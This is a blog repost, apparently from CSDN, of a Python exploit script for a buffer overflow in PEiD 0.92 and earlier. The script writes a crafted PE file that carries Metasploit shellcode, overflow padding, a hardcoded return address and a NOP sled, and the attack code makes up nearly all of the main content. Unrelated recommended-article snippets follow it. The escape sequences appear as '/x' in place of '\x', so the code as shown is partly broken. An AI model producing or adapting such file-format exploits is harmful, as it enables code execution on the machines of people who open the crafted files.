PEiD <= 0.92 Buffer Overflow Exploit

最新推荐文章于 2022-12-09 11:17:54 发布
最新推荐文章于 2022-12-09 11:17:54 发布
阅读量882 收藏
点赞数
分类专栏: Exploit 文章标签: buffer file gmail c
  1. #
  2. # Peid <= 0.92 PE Buffer Overflow Vulnerability
  3. # Vulnerability discovered by Lord Yup
  4. # Exploited by renzhacheng For CN version
  5. # renzhacheng [at] Gmail [dot] com
  6. # http://renzhacheng.blogspot.com
  7. #
  8. import sys
  10. # win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
  11. shellcode = (
  12. "/x29/xc9/x83/xe9/xdd/xd9/xee/xd9/x74/x24/xf4/x5b/x81/x73/x13/x19"
  13. "/xc5/xd8/x59/x83/xeb/xfc/xe2/xf4/xe5/x2d/x9c/x59/x19/xc5/x53/x1c"
  14. "/x25/x4e/xa4/x5c/x61/xc4/x37/xd2/x56/xdd/x53/x06/x39/xc4/x33/x10"
  15. "/x92/xf1/x53/x58/xf7/xf4/x18/xc0/xb5/x41/x18/x2d/x1e/x04/x12/x54"
  16. "/x18/x07/x33/xad/x22/x91/xfc/x5d/x6c/x20/x53/x06/x3d/xc4/x33/x3f"
  17. "/x92/xc9/x93/xd2/x46/xd9/xd9/xb2/x92/xd9/x53/x58/xf2/x4c/x84/x7d"
  18. "/x1d/x06/xe9/x99/x7d/x4e/x98/x69/x9c/x05/xa0/x55/x92/x85/xd4/xd2"
  19. "/x69/xd9/x75/xd2/x71/xcd/x33/x50/x92/x45/x68/x59/x19/xc5/x53/x31"
  20. "/x25/x9a/xe9/xaf/x79/x93/x51/xa1/x9a/x05/xa3/x09/x71/x35/x52/x5d"
  21. "/x46/xad/x40/xa7/x93/xcb/x8f/xa6/xfe/xa6/xb9/x35/x7a/xeb/xbd/x21"
  22. "/x7c/xc5/xd8/x59")
  25. def help_info():
  26.     print ("Usage: /n/t"+sys.argv[0]+" <FileName>/n")
  27.     
  28. exploit = ("/x4D/x5A/x90/x00/x03/x00/x00/x00/x04/x00/x00/x00/xFF/xFF/x00/x00/xB8/x00/x00/x00/x00/x00/x00/x00/x40/x00/x00/x00/x00/x00/x00/x00"
  29. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/xC8/x00/x00/x00"
  30. "/x0E/x1F/xBA/x0E/x00/xB4/x09/xCD/x21/xB8/x01/x4C/xCD/x21/x54/x68/x69/x73/x20/x70/x72/x6F/x67/x72/x61/x6D/x20/x63/x61/x6E/x6E/x6F"
  31. "/x74/x20/x62/x65/x20/x72/x75/x6E/x20/x69/x6E/x20/x44/x4F/x53/x20/x6D/x6F/x64/x65/x2E/x0D/x0D/x0A/x24/x00/x00/x00/x00/x00/x00/x00"
  32. "/xA5/x8A/x2D/xC7/xE1/xEB/x43/x94/xE1/xEB/x43/x94/xE1/xEB/x43/x94/xBE/xC9/x48/x94/xE4/xEB/x43/x94/xE1/xEB/x42/x94/xEA/xEB/x43/x94"
  33. "/x83/xF4/x50/x94/xE4/xEB/x43/x94/x09/xF4/x48/x94/xE3/xEB/x43/x94/x52/x69/x63/x68/xE1/xEB/x43/x94/x00/x00/x00/x00/x00/x00/x00/x00"
  34. "/x00/x00/x00/x00/x00/x00/x00/x00/x50/x45/x00/x00/x4C/x01/x03/x00/x86/xE1/x38/x49/x00/x00/x00/x00/x00/x00/x00/x00/xE0/x00/x0F/x01"
  35. "/x0B/x01/x06/x00/x00/x02/x00/x00/x00/x06/x00/x00/x00/x00/x00/x00/x72/x10/x00/x00/x00/x10/x00/x00/x00/x20/x00/x00/x00/x00/x40/x00"
  36. "/x00/x10/x00/x00/x00/x02/x00/x00/x04/x00/x00/x00/x00/x00/x00/x00/x04/x00/x00/x00/x00/x00/x00/x00/x00/x40/x00/x00/x00/x04/x00/x00"
  37. "/x00/x00/x00/x00/x03/x00/x00/x00/x00/x00/x10/x00/x00/x10/x00/x00/x00/x00/x10/x00/x00/x10/x00/x00/x00/x00/x00/x00/x10/x00/x00/x00"
  38. "/x00/x00/x00/x00/x00/x00/x00/x00/x30/x20/x00/x00/x3C/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  39. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  40. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  41. "/x00/x20/x00/x00/x30/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  42. "/x2E/x74/x65/x78/x74/x00/x00/x00/xFC/x01/x00/x00/x00/x10/x00/x00/x00/x02/x00/x00/x00/x04/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  43. "/x00/x00/x00/x00/x20/x00/x00/x60/x2E/x72/x64/x61/x74/x61/x00/x00/x44/x01/x00/x00/x00/x20/x00/x00/x00/x02/x00/x00/x00/x06/x00/x00"
  44. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x40/x00/x00/x40/x2E/x64/x61/x74/x61/x00/x00/x00/x3C/x02/x00/x00/x00/x30/x00/x00"
  45. "/x00/x02/x00/x00/x00/x08/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x40/x00/x00/xC0/x00/x00/x00/x00/x00/x00/x00/x00"
  46. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  47. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  48. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  49. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  50. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  51. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  52. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  53. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  54. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  55. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  56. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  57. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  58. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  59. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  60. "/x6A/x00/x68/x28/x30/x40/x00/x68/x18/x30/x40/x00/x6A/x00/xFF/x15/x24/x20/x40/x00/x68/x08/x30/x40/x00/xE8/x12/x00/x00/x00/x83/xC4"
  61. "/x04/x33/xC0/xC3/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x55/x8B/xEC/x81/xEC/x04/x04/x00/x00/x8D/x45/x0C/x56/x50/x8D/x85"
  62. "/xFC/xFB/xFF/xFF/xFF/x75/x08/x50/xFF/x15/x28/x20/x40/x00/x8B/xF0/x8D/x45/xFC/x6A/x00/x50/x8D/x85/xFC/xFB/xFF/xFF/x56/x50/x6A/xF5"
  63. "/xFF/x15/x08/x20/x40/x00/x50/xFF/x15/x04/x20/x40/x00/x8B/xC6/x5E/xC9/xC3/x56/xE8/x83/x00/x00/x00/x8B/xF0/xE8/x48/x00/x00/x00/x68"
  64. "/x04/x30/x40/x00/x68/x00/x30/x40/x00/xE8/x1F/x00/x00/x00/x6A/x00/x68/x38/x30/x40/x00/x56/xE8/x65/xFF/xFF/xFF/x83/xC4/x14/x8B/xF0"
  65. "/xE8/x3A/x00/x00/x00/x56/xFF/x15/x0C/x20/x40/x00/x5E/x56/x8B/x74/x24/x08/x3B/x74/x24/x0C/x73/x0D/x8B/x06/x85/xC0/x74/x02/xFF/xD0"
  66. "/x83/xC6/x04/xEB/xED/x5E/xC3/x6A/x20/x58/x6A/x04/x50/xA3/x30/x30/x40/x00/xE8/x0B/x01/x00/x00/x59/xA3/x2C/x30/x40/x00/x59/xC3/x8B"
  67. "/x0D/x34/x30/x40/x00/x85/xC9/x74/x11/xA1/x2C/x30/x40/x00/x8D/x0C/x88/x51/x50/xE8/xB5/xFF/xFF/xFF/x59/x59/xC3/x53/x56/x33/xDB/x57"
  68. "/x89/x1D/x38/x30/x40/x00/xFF/x15/x1C/x20/x40/x00/x8B/xF8/x57/xFF/x15/x18/x20/x40/x00/x40/x50/x53/xFF/x15/x14/x20/x40/x00/x50/xFF"
  69. "/x15/x00/x20/x40/x00/x8B/xF0/x3B/xF3/x75/x07/x33/xC0/xE9/xAC/x00/x00/x00/x57/x56/xFF/x15/x10/x20/x40/x00/x80/x3E/x22/x75/x1A/x46"
  70. "/x89/x35/x38/x30/x40/x00/x8A/x06/x3A/xC3/x74/x07/x3C/x22/x74/x03/x46/xEB/xF3/x38/x1E/x75/x1D/xEB/xD2/x89/x35/x38/x30/x40/x00/x8A"
  71. "/x06/x3A/xC3/x74/x0B/x3C/x20/x74/x07/x3C/x09/x74/x03/x46/xEB/xEF/x38/x1E/x74/x03/x88/x1E/x46/x6A/x01/xB9/x3C/x30/x40/x00/x58/x8A"
  72. "/x16/x3A/xD3/x74/x05/x80/xFA/x20/x74/x05/x80/xFA/x09/x75/x03/x46/xEB/xED/x8A/x16/x3A/xD3/x74/x46/x80/xFA/x22/x75/x17/x46/x40/x89"
  73. "/x31/x83/xC1/x04/x89/x19/x8A/x16/x3A/xD3/x74/x23/x80/xFA/x22/x74/x1E/x46/xEB/xF2/x89/x31/x40/x83/xC1/x04/x89/x19/x8A/x16/x3A/xD3"
  74. "/x74/x0D/x80/xFA/x20/x74/x08/x80/xFA/x09/x74/x03/x46/xEB/xED/x38/x1E/x74/x0B/x88/x1E/x46/x81/xF9/x38/x32/x40/x00/x7C/xA1/x5F/x5E"
  75. "/x5B/xC3/x8B/x44/x24/x04/x0F/xAF/x44/x24/x08/x50/x6A/x08/xFF/x15/x14/x20/x40/x00/x50/xFF/x15/x00/x20/x40/x00/xC3/x00/x00/x00/x00"
  76. "/xEC/x20/x00/x00/xB6/x20/x00/x00/xC2/x20/x00/x00/xD2/x20/x00/x00/xE0/x20/x00/x00/xF8/x20/x00/x00/x0A/x21/x00/x00/x16/x21/x00/x00"
  77. "/x00/x00/x00/x00/x9C/x20/x00/x00/x36/x21/x00/x00/x00/x00/x00/x00/x90/x20/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/xAA/x20/x00/x00"
  78. "/x24/x20/x00/x00/x6C/x20/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x28/x21/x00/x00/x00/x20/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  79. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/xEC/x20/x00/x00/xB6/x20/x00/x00/xC2/x20/x00/x00/xD2/x20/x00/x00/xE0/x20/x00/x00"
  80. "/xF8/x20/x00/x00/x0A/x21/x00/x00/x16/x21/x00/x00/x00/x00/x00/x00/x9C/x20/x00/x00/x36/x21/x00/x00/x00/x00/x00/x00/xBE/x01/x4D/x65"
  81. "/x73/x73/x61/x67/x65/x42/x6F/x78/x41")
  83. code_len = 564 - (len(shellcode) + 100)
  84. overflow1 = "/x41" * 100
  85. overflow2 = "/x41" * code_len
  86. overflow3 = "/x90" * 3
  87. eip = "/x12/x45/xfa/x7f"
  88. long_jmp = "/xe9/x0b/xfe/xff/xff"
  89. nopsled = "/x90" * 20
  91. exploit = exploit+overflow1+shellcode+overflow2+long_jmp+overflow3+eip+long_jmp+nopsled+shellcode+overflow2
  92. exploit += (
  93. "/x00/x55/x53/x45/x52/x33/x32/x2E/x64/x6C/x6C/x00/x00/xDF/x02/x57/x72/x69/x74/x65/x46/x69/x6C/x65/x00/x52/x01/x47/x65/x74/x53/x74"
  94. "/x64/x48/x61/x6E/x64/x6C/x65/x00/x00/x7D/x00/x45/x78/x69/x74/x50/x72/x6F/x63/x65/x73/x73/x00/x02/x03/x6C/x73/x74/x72/x63/x70/x79"
  95. "/x41/x00/x00/x99/x01/x48/x65/x61/x70/x41/x6C/x6C/x6F/x63/x00/x40/x01/x47/x65/x74/x50/x72/x6F/x63/x65/x73/x73/x48/x65/x61/x70/x00"
  96. "/x00/x08/x03/x6C/x73/x74/x72/x6C/x65/x6E/x41/x00/x00/xCA/x00/x47/x65/x74/x43/x6F/x6D/x6D/x61/x6E/x64/x4C/x69/x6E/x65/x41/x00/x4B"
  97. "/x45/x52/x4E/x45/x4C/x33/x32/x2E/x64/x6C/x6C/x00/x00/xAE/x02/x77/x76/x73/x70/x72/x69/x6E/x74/x66/x41/x00/x00/x00/x00/x00/x00/x00"
  98. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  99. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  100. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  101. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  102. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  103. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x48"
  104. "/x65/x6C/x6C/x6F/x20/x57/x6F/x72/x6C/x64/x21/x0A/x00/x00/x00/x48/x65/x6C/x6C/x6F/x20/x57/x6F/x72/x6C/x64/x21/x00/x00/x00/x00/x00"
  105. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  106. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  107. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  108. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  109. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  110. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  111. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  112. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  113. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  114. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  115. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  116. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  117. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  118. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
  119. "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00")
  121. if len(sys.argv)<=1:
  122.     help_info()
  123.     sys.exit(1)
  124. elif (len(sys.argv) ==2):
  125.     file = sys.argv[1]
  126.     print "[+] Creating File...",
  127.     try:
  128.         out_file = open(file,'w')
  129.         out_file.write(exploit)
  130.         out_file.close()
  131.         print "OK"
  132.     except:
  133.         print "Error!"
  134.         sys.exit(1)
  135.     sys.exit(0)
  136. else :
  137.     print "Error input"
  138.     sys.exit(1)
jANxIN
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
How to Using exploits.
Gabriel的专栏
04-08 814
国外的资料,英文不好的话自己查下字典 By RoMeO  I will discuss ways to handle and compile exploits. Alot of exploits come with "noob protection". Noob protection being they will move or add sections of text or
【逆向分析】PEiD查壳
qq_45972928的博客
04-20 3218
工具:PEiD 链接:https://pan.baidu.com/s/1nDuMf6AnHKZUBG1hv-ACvw?pwd=8108 提取码:8108 PEiD界面(中文版) 选项: 一般使用正常扫描就能出结果,不行的话就是用核心扫描等 查壳:将PE文件拉入PEiD界面,程序会自动分析 如果成功扫描,会在下方文本框给出所加壳的信息 有时文本框不显示,可以看EP节点名字,可能就是所加壳的类型 查看程序导入函数,分析功能 可以在导入表中切换查看所含的函数名,根据函数名推测这个函数的功能 .
PEiD的基础使用(持续--)
热门推荐
weixin_42263657的博客
12-03 1万+
首先了解下什么是PE文件: PE是Windows下的可执行文件的格式。这是微软基于UNIX平台的COFF(Common Object File Format,通用文件格式)制成的。微软原本的意思是提高程序的移植型。但是想法是好的,但是实际上只用于Windows系列的操作系统下。 PE文件是指32位的可执行文件,也称PE32。注意:64位的可执行文件称为PE+或PE32+,是PE32的一种扩展,不...
PEID Autism专版绿色版
阳光女孩子
08-10 123
名称:PEID Autism专版绿色版 版本:1.0 软件大小:609 KB 软件语言:简体中文 软件授权:免费版 应用平台:Win7/Vista/Win2003/WinXP PEiD是一款著名的查壳工具,其功能强大,现在有软件很多都加了壳,给破解汉化带来非常大的不便,PEiD几乎可以侦测出所有的壳,其数量已超过470 种PE文档 的加壳类型和签名,另外还可识别出EXE文件是用什么...
结合具体案例说明PEid工具的具体使用方法、用途和含义。
m0_74208186的博客
11-17 4888
1、把需要进行脱壳的exe文件拖到里面即可,这个是暗组2008 vstart软件的信息。2、也可以直接把需要查壳的软件拖到PEiD的界面里,同样能载入到PEiD里(在需要查壳的软件上面按住鼠标左键,再拖动你的鼠标的PEiD的窗口里,最后松开你的鼠标左键)默认的脱壳后的文件放置位置在peid的根目录下。1、打开软件后我们可以单击右上角的三个点的按钮,会弹出一个选择文件的窗口,我们单击我们需要查壳的文件,再点击右下角的 打开 按钮。3、然后我们就可以看到十分详细的信息,比如壳的信息,入口点的位置,区段……
2018安恒杯10月月赛RE&amp;amp;MISC周周练
qq_42192672的博客
11-18 3011
十月月赛反正我是错过了,这次周周练有四道题来看看,菜鸡就该多学习 1.easytree 拖进linux,发现跑不起来,eng? file一下,结果发现是exe PEID查一下 upx壳,直接脱,拖进IDA,直接看main函数 依次分析一下函数吧,2400不知道是啥,198E里面就是欢迎我们的字符串 我们输入的的字符串长度要是15才行 最后我们运算一通之后字符串要转变为aW...
PEiD检测 不是有效的PE文件
哼哼唧唧
12-09 4964
在做逆向分析题目的时候用了好几次PEiD检测是否加壳,都显示不是有效的PE文件,在此记录一下原因。,如果显示不是有效的PE文件,说明你的可执行文件为64位,不能用PEiD检测。下面使用Exeinfo PE查看,Exeinfo相当于PEiD的升级版。下载后想使用中文,从右侧按钮的设置中,选择语言为中文即可。直接把64位可执行文件拖入即可查看信息,这里显示。,即没有加壳,就可以直接用IDA进行调试分析啦~附Exeinfo PE下载地址。
chapter1 静态分析技术-05加壳检查 PEid
weixin_43925963的博客
11-17 215
检查windows可执行文件加壳情况
window8 下PEiD不能正常工作
写程序-分析错误-记录错误
12-03 898
在windows 8.1下,运行PEiD,不能正常工作
PEiD V0.92
05-14
现在软件越来越多的加壳了,给破解带来非常大的不便,但是这个软件可以检测出 435 种壳,非常方便。经分析是目前各类查壳工具中,性能最强的。另外还可识别出EXE文件是用什么语言编写的,比如:VC++、Delphi、VB或...
PEiD V0.92 Build 11.21 汉化版
12-27
PEiD V0.92 Build 11.21汉化版是一款广泛使用的反病毒和反混淆工具,主要用于识别可执行程序(PE文件)的打包器和加壳技术。这款软件是针对英文原版进行了汉化处理,方便中文用户理解和使用,确保了其安全无毒,用户...
PEiD0.92cn.ra
08-02
PEiD0.92cn.ra PEiD0.92cn.ra 查壳
peid0.95_en支持64位_peid_
10-03
PEiD0.95:64位支持与反恶意软件分析工具详解》 在IT安全领域,尤其是恶意软件分析中,PEiD是一款备受推崇的工具。标题中的"peid0.95_en支持64位_peid_"表明我们讨论的是PEiD的0.95版本,该版本特别加入了对64位...
PEID v0,92(汉化版)
11-13
PEID v0.92(汉化版)是一款在IT行业内广泛应用的查壳工具,尤其在软件逆向工程和病毒分析领域中具有重要的地位。它主要用于识别可执行文件(.exe, .dll等)的保护层,即所谓的“壳”。在计算机安全领域,壳通常指的是...
K8s 很难么?带你从头到尾捋一遍,不信你学不会
民工哥的博客
02-23 8873
点击关注公众号,回复“1024”获取2TB学习资源!为什么要学习 Kubernetes?虽然 Docker 已经很强大了,但是在实际使用上还是有诸多不便,比如集群管理、资源调度、文件管理等...
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)
北豼不太皮的博客
02-21 3341
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)一、学习目标二、了解单片机STM32F401RET6三、C语言基础 一、学习目标 二、了解单片机STM32F401RET6 4、STM32F401RE特征 三、C语言基础 1.数据类型 常用2的次方: 2^7 = 128 2^8 = 256 2^15 = 32768 2^16= 65536 51单片机常见的数据类型: char: 占内存1字节 取值范围:-128~127 -2^7 ~ 2
Android开发(1) | Fragment 的应用——新闻应用
Jormungand_V的博客
02-21 6432
文章目录 news_item.xml: &lt;TextView xmlns:android="http://schemas.android.com/apk/res/android" android:id="@+id/news_title" android:layout_width="match_parent" android:layout_height="wrap_content" android:lines="1" android:ellipsize="
系统学习 TypeScript(四)——变量声明的初步学习
编程三昧
02-25 1577
认识了 TypeScript 中的基础类型,接下来当然是变量声明的相关学习了,我在这里记录一下我学习过程中的一些总结。
king peid下载
最新发布
09-11
"King PEID" 是一个软件下载工具,它可以帮助用户下载电脑上所需的软件程序。 PEID 是 "PE Identifier" 的缩写,这是一种用于识别 Windows 可执行文件的工具。 King PEID 是对 PEID 工具的一种改进和扩展。它可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值